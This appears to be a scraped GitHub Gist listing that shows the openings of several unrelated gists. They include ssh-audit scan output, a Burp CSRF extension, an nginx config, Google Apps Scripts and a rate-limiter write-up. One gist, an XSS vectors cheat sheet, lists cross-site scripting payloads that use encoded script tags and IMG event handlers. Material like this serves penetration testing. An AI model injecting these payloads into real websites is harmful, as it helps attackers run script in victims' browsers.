@mattfoster
mattfoster / ssh-audit
Created Apr 23, 2017
ssh-audit scan-me.nmap.org
% ssh-audit scan-me.nmap.org
# general
(gen) banner: SSH-2.0-OpenSSH_6.6.1
(gen) software: OpenSSH 6.6.1
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)
# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
csrf-session-handler.py
from burp import IBurpExtender, ISessionHandlingAction

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.registerSessionHandlingAction(CsrfSessionHandler(callbacks.getHelpers()))

class CsrfSessionHandler(ISessionHandlingAction):
    def __init__(self, helpers):
@mikhailov
mikhailov / gist:9639593
Last active Aug 16, 2021
Nginx S3 Proxy with caching
events {
    worker_connections 1024;
}
http {
    default_type text/html;
    access_log /dev/stdout;
    sendfile on;
    keepalive_timeout 65;
@rushimusmaximus
rushimusmaximus / gmailToSlack.js
Last active Aug 22, 2021
Google Apps Script to post filtered Gmail messages to Slack
/*
The intent of this script is for posting filtered Gmail messages to Slack.
This script could be used on its own with manually-marked messages, but it
is most useful when combined with a Gmail filter. The script assumes that
target messages have had a specific label set on them and have been starred.
The Apps Script can then be set to run periodically.
2015/02 cmyers, rush
@jfcherng
jfcherng / st4-changelog.md
Last active Sep 5, 2021
Sublime Text 4 changelog just because it's not on the official website yet.
exportjson.js
// Includes functions for exporting active sheet or all sheets as JSON object (also Python object syntax compatible).
// Tweak the makePrettyJSON_ function to customize what kind of JSON to export.
var FORMAT_ONELINE = 'One-line';
var FORMAT_MULTILINE = 'Multi-line';
var FORMAT_PRETTY = 'Pretty';
var LANGUAGE_JS = 'JavaScript';
var LANGUAGE_PYTHON = 'Python';
@kurobeats
kurobeats / xss_vectors.txt
Last active Sep 12, 2021
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
0-rate-limiters.md

Scaling your API with rate limiters

The following are examples of the four types of rate limiters discussed in the accompanying blog post. In the examples below I've used pseudocode-like Ruby, so if you're unfamiliar with Ruby you should be able to easily translate this approach to other languages. Complete examples in Ruby are also provided later in this gist.

In most cases you'll want all these examples to be classes, but I've used simple functions here to keep the code samples brief.

Request rate limiter

This uses a basic token bucket algorithm and relies on the fact that Redis scripts execute atomically. No other operations can run between fetching the count and writing the new count.